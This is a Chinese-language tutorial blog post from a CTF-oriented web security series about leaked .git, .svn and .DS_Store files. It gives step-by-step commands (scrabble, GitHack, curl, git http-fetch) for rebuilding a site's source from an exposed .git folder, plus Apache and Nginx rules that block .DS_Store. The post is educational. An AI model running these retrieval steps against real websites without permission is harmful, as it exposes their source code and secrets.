iT邦幫忙

第 11 屆 iThome 鐵人賽
DAY 6
3
Security

Web Security 魔法使攻略系列 第 6

Web Security 魔法使攻略─魔法工程師的小祕密

11th鐵人賽
1305 瀏覽

  • 分享至 

  • xImage
    •  

正文

有些工程師開發網站的時候沒有注意到自己把敏感資料一起放在網路上了,
今天來看看這些「不小心」吧!

版本控制的敏感資訊洩漏

如果公司有進行版本控制系統如 git , svn
這時候要小心有沒有把 .git 或 .svn 一起部屬在線上環境上

使用我們神奇小工具─scrabble,GitHack
這兩個工具都可以幫助我們復原 .git 資料夾

scrabbble 使用方式
scrabble http://<目標 IP 或網站>/

GitHack 使用方式
GitHack.py http://<目標 IP 或網站>/.git/

curl http://<目標 IP 或網站>/.git/
curl http://<目標 IP 或網站>/.git/HEAD
curl http://<目標 IP 或網站>/.git/refs/heads/master
# 53eb21e4b8098bdf094374983b5a35b7213383e0
git init
git http-fetch -a  53eb21e4b8098bdf094374983b5a35b7213383e0 http://<目標IP>/.git/
ls -la
git checkout 53eb21e4b8098bdf094374983b5a35b7213383e0
ls -lat
# 查看內容
git log
git log -p
# you got flag!

取回原始碼會怎麼樣?

  • 壞人會查看你的原始碼,然後再攻擊你。
  • CTF 題目,可能會把 Flag 才在歷史紀錄裡面。

蘋果系統的敏感資訊洩漏─.DS_Store

  • 這是蘋果系統的隱藏檔案
  • 裡面可能會有目錄資訊
  • MacOs 會在所有資料夾,建立 .DS_Store
    使用我們神奇小工具─ds_store_exp

小建議

cd /var/www/ #任何你放 web 資料的地方
find . -type f -iname "*.DS_Store*"
  • Apache 放在 httpd.conf 
<Files ~ "\.DS_Store$">
    Order allow,deny
    Deny from all
</Files>
  • Nginx 設定檔可以放
location ~ \.DS_Store$ {
      deny all;
}

上一篇
Web Security 魔法使攻略─魔法少女的利器
下一篇
Web Security 魔法使攻略─PHP 是世界上最好的語言
系列文
Web Security 魔法使攻略30
  1. 26
    Web Security 魔法使攻略─OWASP TOP 10
  2. 27
    Web Security 魔法使攻略─蒐集敵人的資訊
  3. 28
    Web Security 魔法使攻略─更深入的挑戰
  4. 29
    Web Security 魔法使攻略─魔法工具
  5. 30
    Web Security 魔法使攻略─Web 之路還很長ᕕ ( ᐛ ) ᕗ
完整目錄
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言
iThome鐵人賽
參賽組數
1064
團體組數
40
累計文章數
22183
完賽人數
597
iT+看影片追技術 看影片追技術 看更多
熱門tag 看更多
15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 11th鐵人賽 鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react vue.js
熱門問題
熱門回答
熱門文章
IT邦幫忙